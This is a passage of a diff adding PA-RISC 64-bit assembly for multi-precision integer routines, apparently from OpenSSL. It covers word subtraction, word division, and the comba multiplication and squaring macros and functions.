+	LDO     16(a_ptr),a_ptr
+	LDO     16(b_ptr),b_ptr
+
+	CMPIB,<= 2,n,bn_sub_words_unroll2
+	LDO     16(r_ptr),r_ptr
+
+    CMPIB,=,N 0,n,bn_sub_words_exit ; are we done?
+
+bn_sub_words_single_top
+	LDD     0(a_ptr),t1
+	LDD     0(b_ptr),t2
+	SUB     t1,t2,sub_tmp1            ; t3 = t1-t2; 
+	SUB     sub_tmp1,%ret1,sub_tmp1   ; t3 = t3- c; 
+	CMPCLR,*>> t1,t2,sub_tmp2         ; clear if t1 > t2
+	LDO      1(%r0),sub_tmp2
+	
+	CMPCLR,*= t1,t2,%r0
+	COPY    sub_tmp2,%ret1
+
+	STD     sub_tmp1,0(r_ptr)
+
+bn_sub_words_exit
+    .EXIT
+    BVE     (%rp)
+    EXTRD,U %ret1,31,32,%ret0           ; for 32-bit, return in ret0/ret1
+	.PROCEND	;in=23,24,25,26,29;out=28;
+
+;------------------------------------------------------------------------------
+;
+; unsigned long bn_div_words(unsigned long h, unsigned long l, unsigned long d)
+;
+; arg0 = h
+; arg1 = l
+; arg2 = d
+;
+; This is mainly just output from the HP C compiler.  
+;
+;------------------------------------------------------------------------------
+bn_div_words
+	.PROC
+	.EXPORT	bn_div_words,ENTRY,PRIV_LEV=3,ARGW0=GR,ARGW1=GR,ARGW2=GR,ARGW3=GR,RTNVAL=GR,LONG_RETURN
+	.IMPORT	BN_num_bits_word,CODE
+	;--- not PIC	.IMPORT	__iob,DATA
+	;--- not PIC	.IMPORT	fprintf,CODE
+	.IMPORT	abort,CODE
+	.IMPORT	$$div2U,MILLICODE
+	.CALLINFO CALLER,FRAME=144,ENTRY_GR=%r9,SAVE_RP,ARGS_SAVED,ORDERING_AWARE
+        .ENTRY
+        STW     %r2,-20(%r30)   ;offset 0x8ec
+        STW,MA  %r3,192(%r30)   ;offset 0x8f0
+        STW     %r4,-188(%r30)  ;offset 0x8f4
+        DEPD    %r5,31,32,%r6   ;offset 0x8f8
+        STD     %r6,-184(%r30)  ;offset 0x8fc
+        DEPD    %r7,31,32,%r8   ;offset 0x900
+        STD     %r8,-176(%r30)  ;offset 0x904
+        STW     %r9,-168(%r30)  ;offset 0x908
+        LDD     -248(%r30),%r3  ;offset 0x90c
+        COPY    %r26,%r4        ;offset 0x910
+        COPY    %r24,%r5        ;offset 0x914
+        DEPD    %r25,31,32,%r4  ;offset 0x918
+        CMPB,*<>        %r3,%r0,$0006000C       ;offset 0x91c
+        DEPD    %r23,31,32,%r5  ;offset 0x920
+        MOVIB,TR        -1,%r29,$00060002       ;offset 0x924
+        EXTRD,U %r29,31,32,%r28 ;offset 0x928
+$0006002A
+        LDO     -1(%r29),%r29   ;offset 0x92c
+        SUB     %r23,%r7,%r23   ;offset 0x930
+$00060024
+        SUB     %r4,%r31,%r25   ;offset 0x934
+        AND     %r25,%r19,%r26  ;offset 0x938
+        CMPB,*<>,N      %r0,%r26,$00060046      ;offset 0x93c
+        DEPD,Z  %r25,31,32,%r20 ;offset 0x940
+        OR      %r20,%r24,%r21  ;offset 0x944
+        CMPB,*<<,N      %r21,%r23,$0006002A     ;offset 0x948
+        SUB     %r31,%r2,%r31   ;offset 0x94c
+$00060046
+$0006002E
+        DEPD,Z  %r23,31,32,%r25 ;offset 0x950
+        EXTRD,U %r23,31,32,%r26 ;offset 0x954
+        AND     %r25,%r19,%r24  ;offset 0x958
+        ADD,L   %r31,%r26,%r31  ;offset 0x95c
+        CMPCLR,*>>=     %r5,%r24,%r0    ;offset 0x960
+        LDO     1(%r31),%r31    ;offset 0x964
+$00060032
+        CMPB,*<<=,N     %r31,%r4,$00060036      ;offset 0x968
+        LDO     -1(%r29),%r29   ;offset 0x96c
+        ADD,L   %r4,%r3,%r4     ;offset 0x970
+$00060036
+        ADDIB,=,N       -1,%r8,$D0      ;offset 0x974
+        SUB     %r5,%r24,%r28   ;offset 0x978
+$0006003A
+        SUB     %r4,%r31,%r24   ;offset 0x97c
+        SHRPD   %r24,%r28,32,%r4        ;offset 0x980
+        DEPD,Z  %r29,31,32,%r9  ;offset 0x984
+        DEPD,Z  %r28,31,32,%r5  ;offset 0x988
+$0006001C
+        EXTRD,U %r4,31,32,%r31  ;offset 0x98c
+        CMPB,*<>,N      %r31,%r2,$00060020      ;offset 0x990
+        MOVB,TR %r6,%r29,$D1    ;offset 0x994
+        STD     %r29,-152(%r30) ;offset 0x998
+$0006000C
+        EXTRD,U %r3,31,32,%r25  ;offset 0x99c
+        COPY    %r3,%r26        ;offset 0x9a0
+        EXTRD,U %r3,31,32,%r9   ;offset 0x9a4
+        EXTRD,U %r4,31,32,%r8   ;offset 0x9a8
+        .CALL   ARGW0=GR,ARGW1=GR,RTNVAL=GR     ;in=25,26;out=28;
+        B,L     BN_num_bits_word,%r2    ;offset 0x9ac
+        EXTRD,U %r5,31,32,%r7   ;offset 0x9b0
+        LDI     64,%r20 ;offset 0x9b4
+        DEPD    %r7,31,32,%r5   ;offset 0x9b8
+        DEPD    %r8,31,32,%r4   ;offset 0x9bc
+        DEPD    %r9,31,32,%r3   ;offset 0x9c0
+        CMPB,=  %r28,%r20,$00060012     ;offset 0x9c4
+        COPY    %r28,%r24       ;offset 0x9c8
+        MTSARCM %r24    ;offset 0x9cc
+        DEPDI,Z -1,%sar,1,%r19  ;offset 0x9d0
+        CMPB,*>>,N      %r4,%r19,$D2    ;offset 0x9d4
+$00060012
+        SUBI    64,%r24,%r31    ;offset 0x9d8
+        CMPCLR,*<<      %r4,%r3,%r0     ;offset 0x9dc
+        SUB     %r4,%r3,%r4     ;offset 0x9e0
+$00060016
+        CMPB,=  %r31,%r0,$0006001A      ;offset 0x9e4
+        COPY    %r0,%r9 ;offset 0x9e8
+        MTSARCM %r31    ;offset 0x9ec
+        DEPD,Z  %r3,%sar,64,%r3 ;offset 0x9f0
+        SUBI    64,%r31,%r26    ;offset 0x9f4
+        MTSAR   %r26    ;offset 0x9f8
+        SHRPD   %r4,%r5,%sar,%r4        ;offset 0x9fc
+        MTSARCM %r31    ;offset 0xa00
+        DEPD,Z  %r5,%sar,64,%r5 ;offset 0xa04
+$0006001A
+        DEPDI,Z -1,31,32,%r19   ;offset 0xa08
+        AND     %r3,%r19,%r29   ;offset 0xa0c
+        EXTRD,U %r29,31,32,%r2  ;offset 0xa10
+        DEPDI,Z -1,63,32,%r6    ;offset 0xa14
+        MOVIB,TR        2,%r8,$0006001C ;offset 0xa18
+        EXTRD,U %r3,63,32,%r7   ;offset 0xa1c
+$D2
+        ;--- not PIC	ADDIL   LR'__iob-$global$,%r27,%r1      ;offset 0xa20
+        ;--- not PIC	LDIL    LR'C$7,%r21     ;offset 0xa24
+        ;--- not PIC	LDO     RR'__iob-$global$+32(%r1),%r26  ;offset 0xa28
+        ;--- not PIC	.CALL   ARGW0=GR,ARGW1=GR,ARGW2=GR,RTNVAL=GR    ;in=24,25,26;out=28;
+        ;--- not PIC	B,L     fprintf,%r2     ;offset 0xa2c
+        ;--- not PIC	LDO     RR'C$7(%r21),%r25       ;offset 0xa30
+        .CALL           ;
+        B,L     abort,%r2       ;offset 0xa34
+        NOP             ;offset 0xa38
+        B       $D3     ;offset 0xa3c
+        LDW     -212(%r30),%r2  ;offset 0xa40
+$00060020
+        COPY    %r4,%r26        ;offset 0xa44
+        EXTRD,U %r4,31,32,%r25  ;offset 0xa48
+        COPY    %r2,%r24        ;offset 0xa4c
+        .CALL   ;in=23,24,25,26;out=20,21,22,28,29; (MILLICALL)
+        B,L     $$div2U,%r31    ;offset 0xa50
+        EXTRD,U %r2,31,32,%r23  ;offset 0xa54
+        DEPD    %r28,31,32,%r29 ;offset 0xa58
+$00060022
+        STD     %r29,-152(%r30) ;offset 0xa5c
+$D1
+        AND     %r5,%r19,%r24   ;offset 0xa60
+        EXTRD,U %r24,31,32,%r24 ;offset 0xa64
+        STW     %r2,-160(%r30)  ;offset 0xa68
+        STW     %r7,-128(%r30)  ;offset 0xa6c
+        FLDD    -152(%r30),%fr4 ;offset 0xa70
+        FLDD    -152(%r30),%fr7 ;offset 0xa74
+        FLDW    -160(%r30),%fr8L        ;offset 0xa78
+        FLDW    -128(%r30),%fr5L        ;offset 0xa7c
+        XMPYU   %fr8L,%fr7L,%fr10       ;offset 0xa80
+        FSTD    %fr10,-136(%r30)        ;offset 0xa84
+        XMPYU   %fr8L,%fr7R,%fr22       ;offset 0xa88
+        FSTD    %fr22,-144(%r30)        ;offset 0xa8c
+        XMPYU   %fr5L,%fr4L,%fr11       ;offset 0xa90
+        XMPYU   %fr5L,%fr4R,%fr23       ;offset 0xa94
+        FSTD    %fr11,-112(%r30)        ;offset 0xa98
+        FSTD    %fr23,-120(%r30)        ;offset 0xa9c
+        LDD     -136(%r30),%r28 ;offset 0xaa0
+        DEPD,Z  %r28,31,32,%r31 ;offset 0xaa4
+        LDD     -144(%r30),%r20 ;offset 0xaa8
+        ADD,L   %r20,%r31,%r31  ;offset 0xaac
+        LDD     -112(%r30),%r22 ;offset 0xab0
+        DEPD,Z  %r22,31,32,%r22 ;offset 0xab4
+        LDD     -120(%r30),%r21 ;offset 0xab8
+        B       $00060024       ;offset 0xabc
+        ADD,L   %r21,%r22,%r23  ;offset 0xac0
+$D0
+        OR      %r9,%r29,%r29   ;offset 0xac4
+$00060040
+        EXTRD,U %r29,31,32,%r28 ;offset 0xac8
+$00060002
+$L2
+        LDW     -212(%r30),%r2  ;offset 0xacc
+$D3
+        LDW     -168(%r30),%r9  ;offset 0xad0
+        LDD     -176(%r30),%r8  ;offset 0xad4
+        EXTRD,U %r8,31,32,%r7   ;offset 0xad8
+        LDD     -184(%r30),%r6  ;offset 0xadc
+        EXTRD,U %r6,31,32,%r5   ;offset 0xae0
+        LDW     -188(%r30),%r4  ;offset 0xae4
+        BVE     (%r2)   ;offset 0xae8
+        .EXIT
+        LDW,MB  -192(%r30),%r3  ;offset 0xaec
+	.PROCEND	;in=23,25;out=28,29;fpin=105,107;
+
+
+
+
+;----------------------------------------------------------------------------
+;
+; Registers to hold 64-bit values to manipulate.  The "L" part
+; of the register corresponds to the upper 32-bits, while the "R"
+; part corresponds to the lower 32-bits
+; 
+; Note, that when using b6 and b7, the code must save these before
+; using them because they are callee save registers 
+; 
+;
+; Floating point registers to use to save values that
+; are manipulated.  These don't collide with ftemp1-6 and
+; are all caller save registers
+;
+a0        .reg %fr22
+a0L       .reg %fr22L
+a0R       .reg %fr22R
+
+a1        .reg %fr23
+a1L       .reg %fr23L
+a1R       .reg %fr23R
+
+a2        .reg %fr24
+a2L       .reg %fr24L
+a2R       .reg %fr24R
+
+a3        .reg %fr25
+a3L       .reg %fr25L
+a3R       .reg %fr25R
+
+a4        .reg %fr26
+a4L       .reg %fr26L
+a4R       .reg %fr26R
+
+a5        .reg %fr27
+a5L       .reg %fr27L
+a5R       .reg %fr27R
+
+a6        .reg %fr28
+a6L       .reg %fr28L
+a6R       .reg %fr28R
+
+a7        .reg %fr29
+a7L       .reg %fr29L
+a7R       .reg %fr29R
+
+b0        .reg %fr30
+b0L       .reg %fr30L
+b0R       .reg %fr30R
+
+b1        .reg %fr31
+b1L       .reg %fr31L
+b1R       .reg %fr31R
+
+;
+; Temporary floating point variables, these are all caller save
+; registers
+;
+ftemp1    .reg %fr4
+ftemp2    .reg %fr5
+ftemp3    .reg %fr6
+ftemp4    .reg %fr7
+
+;
+; The B set of registers when used.
+;
+
+b2        .reg %fr8
+b2L       .reg %fr8L
+b2R       .reg %fr8R
+
+b3        .reg %fr9
+b3L       .reg %fr9L
+b3R       .reg %fr9R
+
+b4        .reg %fr10
+b4L       .reg %fr10L
+b4R       .reg %fr10R
+
+b5        .reg %fr11
+b5L       .reg %fr11L
+b5R       .reg %fr11R
+
+b6        .reg %fr12
+b6L       .reg %fr12L
+b6R       .reg %fr12R
+
+b7        .reg %fr13
+b7L       .reg %fr13L
+b7R       .reg %fr13R
+
+c1           .reg %r21   ; only reg
+temp1        .reg %r20   ; only reg
+temp2        .reg %r19   ; only reg
+temp3        .reg %r31   ; only reg
+
+m1           .reg %r28   
+c2           .reg %r23   
+high_one     .reg %r1
+ht           .reg %r6
+lt           .reg %r5
+m            .reg %r4
+c3           .reg %r3
+
+SQR_ADD_C  .macro  A0L,A0R,C1,C2,C3
+    XMPYU   A0L,A0R,ftemp1       ; m
+    FSTD    ftemp1,-24(%sp)      ; store m
+
+    XMPYU   A0R,A0R,ftemp2       ; lt
+    FSTD    ftemp2,-16(%sp)      ; store lt
+
+    XMPYU   A0L,A0L,ftemp3       ; ht
+    FSTD    ftemp3,-8(%sp)       ; store ht
+
+    LDD     -24(%sp),m           ; load m
+    AND     m,high_mask,temp2    ; m & Mask
+    DEPD,Z  m,30,31,temp3        ; m << 32+1
+    LDD     -16(%sp),lt          ; lt
+
+    LDD     -8(%sp),ht           ; ht
+    EXTRD,U temp2,32,33,temp1    ; temp1 = m&Mask >> 32-1
+    ADD     temp3,lt,lt          ; lt = lt+m
+    ADD,L   ht,temp1,ht          ; ht += temp1
+    ADD,DC  ht,%r0,ht            ; ht++
+
+    ADD     C1,lt,C1             ; c1=c1+lt
+    ADD,DC  ht,%r0,ht            ; ht++
+
+    ADD     C2,ht,C2             ; c2=c2+ht
+    ADD,DC  C3,%r0,C3            ; c3++
+.endm
+
+SQR_ADD_C2 .macro  A0L,A0R,A1L,A1R,C1,C2,C3
+    XMPYU   A0L,A1R,ftemp1          ; m1 = bl*ht
+    FSTD    ftemp1,-16(%sp)         ;
+    XMPYU   A0R,A1L,ftemp2          ; m = bh*lt
+    FSTD    ftemp2,-8(%sp)          ;
+    XMPYU   A0R,A1R,ftemp3          ; lt = bl*lt
+    FSTD    ftemp3,-32(%sp)
+    XMPYU   A0L,A1L,ftemp4          ; ht = bh*ht
+    FSTD    ftemp4,-24(%sp)         ;
+
+    LDD     -8(%sp),m               ; r21 = m
+    LDD     -16(%sp),m1             ; r19 = m1
+    ADD,L   m,m1,m                  ; m+m1
+
+    DEPD,Z  m,31,32,temp3           ; (m+m1<<32)
+    LDD     -24(%sp),ht             ; r24 = ht
+
+    CMPCLR,*>>= m,m1,%r0            ; if (m < m1)
+    ADD,L   ht,high_one,ht          ; ht+=high_one
+
+    EXTRD,U m,31,32,temp1           ; m >> 32
+    LDD     -32(%sp),lt             ; lt
+    ADD,L   ht,temp1,ht             ; ht+= m>>32
+    ADD     lt,temp3,lt             ; lt = lt+m1
+    ADD,DC  ht,%r0,ht               ; ht++
+
+    ADD     ht,ht,ht                ; ht=ht+ht;
+    ADD,DC  C3,%r0,C3               ; add in carry (c3++)
+
+    ADD     lt,lt,lt                ; lt=lt+lt;
+    ADD,DC  ht,%r0,ht               ; add in carry (ht++)
+
+    ADD     C1,lt,C1                ; c1=c1+lt
+    ADD,DC,*NUV ht,%r0,ht           ; add in carry (ht++)
+    LDO     1(C3),C3              ; bump c3 if overflow,nullify otherwise
+
+    ADD     C2,ht,C2                ; c2 = c2 + ht
+    ADD,DC  C3,%r0,C3             ; add in carry (c3++)
+.endm
+
+;
+;void bn_sqr_comba8(BN_ULONG *r, BN_ULONG *a)
+; arg0 = r_ptr
+; arg1 = a_ptr
+;
+
+bn_sqr_comba8
+	.PROC
+	.CALLINFO FRAME=128,ENTRY_GR=%r3,ARGS_SAVED,ORDERING_AWARE
+	.EXPORT	bn_sqr_comba8,ENTRY,PRIV_LEV=3,NO_RELOCATION,LONG_RETURN
+    .ENTRY
+	.align 64
+
+    STD     %r3,0(%sp)          ; save r3
+    STD     %r4,8(%sp)          ; save r4
+    STD     %r5,16(%sp)         ; save r5
+    STD     %r6,24(%sp)         ; save r6
+
+	;
+	; Zero out carries
+	;
+	COPY     %r0,c1
+	COPY     %r0,c2
+	COPY     %r0,c3
+
+	LDO      128(%sp),%sp       ; bump stack
+    DEPDI,Z -1,32,33,high_mask   ; Create Mask 0xffffffff80000000L
+    DEPDI,Z  1,31,1,high_one     ; Create Value  1 << 32
+
+	;
+	; Load up all of the values we are going to use
+	;
+    FLDD     0(a_ptr),a0       
+    FLDD     8(a_ptr),a1       
+    FLDD    16(a_ptr),a2       
+    FLDD    24(a_ptr),a3       
+    FLDD    32(a_ptr),a4       
+    FLDD    40(a_ptr),a5       
+    FLDD    48(a_ptr),a6       
+    FLDD    56(a_ptr),a7       
+
+	SQR_ADD_C a0L,a0R,c1,c2,c3
+	STD     c1,0(r_ptr)          ; r[0] = c1;
+	COPY    %r0,c1
+
+	SQR_ADD_C2 a1L,a1R,a0L,a0R,c2,c3,c1
+	STD     c2,8(r_ptr)          ; r[1] = c2;
+	COPY    %r0,c2
+
+	SQR_ADD_C a1L,a1R,c3,c1,c2
+	SQR_ADD_C2 a2L,a2R,a0L,a0R,c3,c1,c2
+	STD     c3,16(r_ptr)            ; r[2] = c3;
+	COPY    %r0,c3
+
+	SQR_ADD_C2 a3L,a3R,a0L,a0R,c1,c2,c3
+	SQR_ADD_C2 a2L,a2R,a1L,a1R,c1,c2,c3
+	STD     c1,24(r_ptr)           ; r[3] = c1;
+	COPY    %r0,c1
+
+	SQR_ADD_C a2L,a2R,c2,c3,c1
+	SQR_ADD_C2 a3L,a3R,a1L,a1R,c2,c3,c1
+	SQR_ADD_C2 a4L,a4R,a0L,a0R,c2,c3,c1
+	STD     c2,32(r_ptr)          ; r[4] = c2;
+	COPY    %r0,c2
+
+	SQR_ADD_C2 a5L,a5R,a0L,a0R,c3,c1,c2
+	SQR_ADD_C2 a4L,a4R,a1L,a1R,c3,c1,c2
+	SQR_ADD_C2 a3L,a3R,a2L,a2R,c3,c1,c2
+	STD     c3,40(r_ptr)          ; r[5] = c3;
+	COPY    %r0,c3
+
+	SQR_ADD_C a3L,a3R,c1,c2,c3
+	SQR_ADD_C2 a4L,a4R,a2L,a2R,c1,c2,c3
+	SQR_ADD_C2 a5L,a5R,a1L,a1R,c1,c2,c3
+	SQR_ADD_C2 a6L,a6R,a0L,a0R,c1,c2,c3
+	STD     c1,48(r_ptr)          ; r[6] = c1;
+	COPY    %r0,c1
+
+	SQR_ADD_C2 a7L,a7R,a0L,a0R,c2,c3,c1
+	SQR_ADD_C2 a6L,a6R,a1L,a1R,c2,c3,c1
+	SQR_ADD_C2 a5L,a5R,a2L,a2R,c2,c3,c1
+	SQR_ADD_C2 a4L,a4R,a3L,a3R,c2,c3,c1
+	STD     c2,56(r_ptr)          ; r[7] = c2;
+	COPY    %r0,c2
+
+	SQR_ADD_C a4L,a4R,c3,c1,c2
+	SQR_ADD_C2 a5L,a5R,a3L,a3R,c3,c1,c2
+	SQR_ADD_C2 a6L,a6R,a2L,a2R,c3,c1,c2
+	SQR_ADD_C2 a7L,a7R,a1L,a1R,c3,c1,c2
+	STD     c3,64(r_ptr)          ; r[8] = c3;
+	COPY    %r0,c3
+
+	SQR_ADD_C2 a7L,a7R,a2L,a2R,c1,c2,c3
+	SQR_ADD_C2 a6L,a6R,a3L,a3R,c1,c2,c3
+	SQR_ADD_C2 a5L,a5R,a4L,a4R,c1,c2,c3
+	STD     c1,72(r_ptr)          ; r[9] = c1;
+	COPY    %r0,c1
+
+	SQR_ADD_C a5L,a5R,c2,c3,c1
+	SQR_ADD_C2 a6L,a6R,a4L,a4R,c2,c3,c1
+	SQR_ADD_C2 a7L,a7R,a3L,a3R,c2,c3,c1
+	STD     c2,80(r_ptr)          ; r[10] = c2;
+	COPY    %r0,c2
+
+	SQR_ADD_C2 a7L,a7R,a4L,a4R,c3,c1,c2
+	SQR_ADD_C2 a6L,a6R,a5L,a5R,c3,c1,c2
+	STD     c3,88(r_ptr)          ; r[11] = c3;
+	COPY    %r0,c3
+	
+	SQR_ADD_C a6L,a6R,c1,c2,c3
+	SQR_ADD_C2 a7L,a7R,a5L,a5R,c1,c2,c3
+	STD     c1,96(r_ptr)          ; r[12] = c1;
+	COPY    %r0,c1
+
+	SQR_ADD_C2 a7L,a7R,a6L,a6R,c2,c3,c1
+	STD     c2,104(r_ptr)         ; r[13] = c2;
+	COPY    %r0,c2
+
+	SQR_ADD_C a7L,a7R,c3,c1,c2
+	STD     c3, 112(r_ptr)       ; r[14] = c3
+	STD     c1, 120(r_ptr)       ; r[15] = c1
+
+    .EXIT
+    LDD     -104(%sp),%r6        ; restore r6
+    LDD     -112(%sp),%r5        ; restore r5
+    LDD     -120(%sp),%r4        ; restore r4
+    BVE     (%rp)
+    LDD,MB  -128(%sp),%r3
+
+	.PROCEND	
+
+;-----------------------------------------------------------------------------
+;
+;void bn_sqr_comba4(BN_ULONG *r, BN_ULONG *a)
+; arg0 = r_ptr
+; arg1 = a_ptr
+;
+
+bn_sqr_comba4
+	.proc
+	.callinfo FRAME=128,ENTRY_GR=%r3,ARGS_SAVED,ORDERING_AWARE
+	.EXPORT	bn_sqr_comba4,ENTRY,PRIV_LEV=3,NO_RELOCATION,LONG_RETURN
+    .entry
+	.align 64
+    STD     %r3,0(%sp)          ; save r3
+    STD     %r4,8(%sp)          ; save r4
+    STD     %r5,16(%sp)         ; save r5
+    STD     %r6,24(%sp)         ; save r6
+
+	;
+	; Zero out carries
+	;
+	COPY     %r0,c1
+	COPY     %r0,c2
+	COPY     %r0,c3
+
+	LDO      128(%sp),%sp       ; bump stack
+    DEPDI,Z -1,32,33,high_mask   ; Create Mask 0xffffffff80000000L
+    DEPDI,Z  1,31,1,high_one     ; Create Value  1 << 32
+
+	;
+	; Load up all of the values we are going to use
+	;
+    FLDD     0(a_ptr),a0       
+    FLDD     8(a_ptr),a1       
+    FLDD    16(a_ptr),a2       
+    FLDD    24(a_ptr),a3       
+    FLDD    32(a_ptr),a4       
+    FLDD    40(a_ptr),a5       
+    FLDD    48(a_ptr),a6       
+    FLDD    56(a_ptr),a7       
+
+	SQR_ADD_C a0L,a0R,c1,c2,c3
+
+	STD     c1,0(r_ptr)          ; r[0] = c1;
+	COPY    %r0,c1
+
+	SQR_ADD_C2 a1L,a1R,a0L,a0R,c2,c3,c1
+
+	STD     c2,8(r_ptr)          ; r[1] = c2;
+	COPY    %r0,c2
+
+	SQR_ADD_C a1L,a1R,c3,c1,c2
+	SQR_ADD_C2 a2L,a2R,a0L,a0R,c3,c1,c2
+
+	STD     c3,16(r_ptr)            ; r[2] = c3;
+	COPY    %r0,c3
+
+	SQR_ADD_C2 a3L,a3R,a0L,a0R,c1,c2,c3
+	SQR_ADD_C2 a2L,a2R,a1L,a1R,c1,c2,c3
+
+	STD     c1,24(r_ptr)           ; r[3] = c1;
+	COPY    %r0,c1
+
+	SQR_ADD_C a2L,a2R,c2,c3,c1
+	SQR_ADD_C2 a3L,a3R,a1L,a1R,c2,c3,c1
+
+	STD     c2,32(r_ptr)           ; r[4] = c2;
+	COPY    %r0,c2
+
+	SQR_ADD_C2 a3L,a3R,a2L,a2R,c3,c1,c2
+	STD     c3,40(r_ptr)           ; r[5] = c3;
+	COPY    %r0,c3
+
+	SQR_ADD_C a3L,a3R,c1,c2,c3
+	STD     c1,48(r_ptr)           ; r[6] = c1;
+	STD     c2,56(r_ptr)           ; r[7] = c2;
+
+    .EXIT
+    LDD     -104(%sp),%r6        ; restore r6
+    LDD     -112(%sp),%r5        ; restore r5
+    LDD     -120(%sp),%r4        ; restore r4
+    BVE     (%rp)
+    LDD,MB  -128(%sp),%r3
+
+	.PROCEND	
+
+
+;---------------------------------------------------------------------------
+
+MUL_ADD_C  .macro  A0L,A0R,B0L,B0R,C1,C2,C3
+    XMPYU   A0L,B0R,ftemp1        ; m1 = bl*ht
+    FSTD    ftemp1,-16(%sp)       ;
+    XMPYU   A0R,B0L,ftemp2        ; m = bh*lt
+    FSTD    ftemp2,-8(%sp)        ;
+    XMPYU   A0R,B0R,ftemp3        ; lt = bl*lt
+    FSTD    ftemp3,-32(%sp)
+    XMPYU   A0L,B0L,ftemp4        ; ht = bh*ht
+    FSTD    ftemp4,-24(%sp)       ;
+
+    LDD     -8(%sp),m             ; r21 = m
+    LDD     -16(%sp),m1           ; r19 = m1
+    ADD,L   m,m1,m                ; m+m1
+
+    DEPD,Z  m,31,32,temp3         ; (m+m1<<32)
+    LDD     -24(%sp),ht           ; r24 = ht
+
+    CMPCLR,*>>= m,m1,%r0          ; if (m < m1)
+    ADD,L   ht,high_one,ht        ; ht+=high_one
+
+    EXTRD,U m,31,32,temp1         ; m >> 32
+    LDD     -32(%sp),lt           ; lt
+    ADD,L   ht,temp1,ht           ; ht+= m>>32
+    ADD     lt,temp3,lt           ; lt = lt+m1
+    ADD,DC  ht,%r0,ht             ; ht++
+
+    ADD     C1,lt,C1              ; c1=c1+lt
+    ADD,DC  ht,%r0,ht             ; bump c3 if overflow,nullify otherwise
+
+    ADD     C2,ht,C2              ; c2 = c2 + ht
+    ADD,DC  C3,%r0,C3             ; add in carry (c3++)
+.endm
+
+
+;
+;void bn_mul_comba8(BN_ULONG *r, BN_ULONG *a, BN_ULONG *b)
+; arg0 = r_ptr
+; arg1 = a_ptr
+; arg2 = b_ptr
+;
+
+bn_mul_comba8
+	.proc
+	.callinfo FRAME=128,ENTRY_GR=%r3,ARGS_SAVED,ORDERING_AWARE
+	.EXPORT	bn_mul_comba8,ENTRY,PRIV_LEV=3,NO_RELOCATION,LONG_RETURN
+    .entry
+	.align 64
+
+    STD     %r3,0(%sp)          ; save r3
+    STD     %r4,8(%sp)          ; save r4
+    STD     %r5,16(%sp)         ; save r5
+    STD     %r6,24(%sp)         ; save r6
+    FSTD    %fr12,32(%sp)       ; save r6
+    FSTD    %fr13,40(%sp)       ; save r7
+
+	;
+	; Zero out carries
+	;
+	COPY     %r0,c1
+	COPY     %r0,c2
+	COPY     %r0,c3
+
+	LDO      128(%sp),%sp       ; bump stack
+    DEPDI,Z  1,31,1,high_one     ; Create Value  1 << 32
+
+	;
+	; Load up all of the values we are going to use
+	;
+    FLDD      0(a_ptr),a0       
+    FLDD      8(a_ptr),a1       
+    FLDD     16(a_ptr),a2       
+    FLDD     24(a_ptr),a3       
+    FLDD     32(a_ptr),a4       
+    FLDD     40(a_ptr),a5       
+    FLDD     48(a_ptr),a6       
+    FLDD     56(a_ptr),a7       
+
+    FLDD      0(b_ptr),b0       
+    FLDD      8(b_ptr),b1       
+    FLDD     16(b_ptr),b2       
+    FLDD     24(b_ptr),b3       
+    FLDD     32(b_ptr),b4       
+    FLDD     40(b_ptr),b5       
+    FLDD     48(b_ptr),b6       
+    FLDD     56(b_ptr),b7       
+
+	MUL_ADD_C a0L,a0R,b0L,b0R,c1,c2,c3
+	STD       c1,0(r_ptr)
+	COPY      %r0,c1
+
+	MUL_ADD_C a0L,a0R,b1L,b1R,c2,c3,c1
+	MUL_ADD_C a1L,a1R,b0L,b0R,c2,c3,c1
+	STD       c2,8(r_ptr)
+	COPY      %r0,c2
+
+	MUL_ADD_C a2L,a2R,b0L,b0R,c3,c1,c2
+	MUL_ADD_C a1L,a1R,b1L,b1R,c3,c1,c2
+	MUL_ADD_C a0L,a0R,b2L,b2R,c3,c1,c2
+	STD       c3,16(r_ptr)
+	COPY      %r0,c3
+
+	MUL_ADD_C a0L,a0R,b3L,b3R,c1,c2,c3
+	MUL_ADD_C a1L,a1R,b2L,b2R,c1,c2,c3
+	MUL_ADD_C a2L,a2R,b1L,b1R,c1,c2,c3
+	MUL_ADD_C a3L,a3R,b0L,b0R,c1,c2,c3
+	STD       c1,24(r_ptr)
+	COPY      %r0,c1
+
+	MUL_ADD_C a4L,a4R,b0L,b0R,c2,c3,c1
+	MUL_ADD_C a3L,a3R,b1L,b1R,c2,c3,c1
+	MUL_ADD_C a2L,a2R,b2L,b2R,c2,c3,c1
+	MUL_ADD_C a1L,a1R,b3L,b3R,c2,c3,c1
+	MUL_ADD_C a0L,a0R,b4L,b4R,c2,c3,c1
+	STD       c2,32(r_ptr)
+	COPY      %r0,c2
+
+	MUL_ADD_C a0L,a0R,b5L,b5R,c3,c1,c2
+	MUL_ADD_C a1L,a1R,b4L,b4R,c3,c1,c2
+	MUL_ADD_C a2L,a2R,b3L,b3R,c3,c1,c2
+	MUL_ADD_C a3L,a3R,b2L,b2R,c3,c1,c2
+	MUL_ADD_C a4L,a4R,b1L,b1R,c3,c1,c2
+	MUL_ADD_C a5L,a5R,b0L,b0R,c3,c1,c2
+	STD       c3,40(r_ptr)
+	COPY      %r0,c3
+
+	MUL_ADD_C a6L,a6R,b0L,b0R,c1,c2,c3
+	MUL_ADD_C a5L,a5R,b1L,b1R,c1,c2,c3
+	MUL_ADD_C a4L,a4R,b2L,b2R,c1,c2,c3
+	MUL_ADD_C a3L,a3R,b3L,b3R,c1,c2,c3
+	MUL_ADD_C a2L,a2R,b4L,b4R,c1,c2,c3
+	MUL_ADD_C a1L,a1R,b5L,b5R,c1,c2,c3
+	MUL_ADD_C a0L,a0R,b6L,b6R,c1,c2,c3
+	STD       c1,48(r_ptr)
+	COPY      %r0,c1
+	
+	MUL_ADD_C a0L,a0R,b7L,b7R,c2,c3,c1
+	MUL_ADD_C a1L,a1R,b6L,b6R,c2,c3,c1
+	MUL_ADD_C a2L,a2R,b5L,b5R,c2,c3,c1
+	MUL_ADD_C a3L,a3R,b4L,b4R,c2,c3,c1
+	MUL_ADD_C a4L,a4R,b3L,b3R,c2,c3,c1
+	MUL_ADD_C a5L,a5R,b2L,b2R,c2,c3,c1
+	MUL_ADD_C a6L,a6R,b1L,b1R,c2,c3,c1
+	MUL_ADD_C a7L,a7R,b0L,b0R,c2,c3,c1
+	STD       c2,56(r_ptr)
+	COPY      %r0,c2
+
+	MUL_ADD_C a7L,a7R,b1L,b1R,c3,c1,c2
+	MUL_ADD_C a6L,a6R,b2L,b2R,c3,c1,c2
+	MUL_ADD_C a5L,a5R,b3L,b3R,c3,c1,c2
+	MUL_ADD_C a4L,a4R,b4L,b4R,c3,c1,c2
